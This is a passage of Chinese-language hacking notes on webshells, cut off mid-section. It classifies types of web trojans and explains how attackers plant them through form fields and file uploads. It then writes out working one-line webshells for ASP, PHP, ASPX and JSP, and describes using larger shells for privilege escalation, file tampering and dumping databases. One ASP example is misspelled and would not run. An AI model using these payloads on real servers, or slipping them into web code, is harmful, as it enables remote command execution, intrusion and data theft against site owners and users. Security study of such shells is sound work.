1、webshell种类
- 一句话木马
- 小马
- 大马
- 打包马
- 脱裤马
- 等等
2、一句话木马
2.1、介绍
-
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
-
<%excute request("value")%>
2.2、工作原理
-
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
-
<%excute request("value")%>
-
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
-
<%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的使用)
-
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了)
-
这就被称为一句话木马,他是基于B/S架构的
2.3、常见写法
-
asp一句话木马:
<%eval request("c")%>
-
php一句话木马:
<?php @eval($_POST[value]);?>
-
aspx一句话木马:
<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>
-
jsp一句话木马:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
3、小马&大马
3.1、介绍
- 小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能
- 大马体积比较大,一般50k以上,功能也多,一半都包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些已具备自带提权功能和压缩,解压缩网站程序的功能。这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序
3.2、使用
-
小马的使用
主要用来上传大马
-
大马的使用
提权、打包、脱裤、增删文件等
4、一句话木马的制作和上传
- <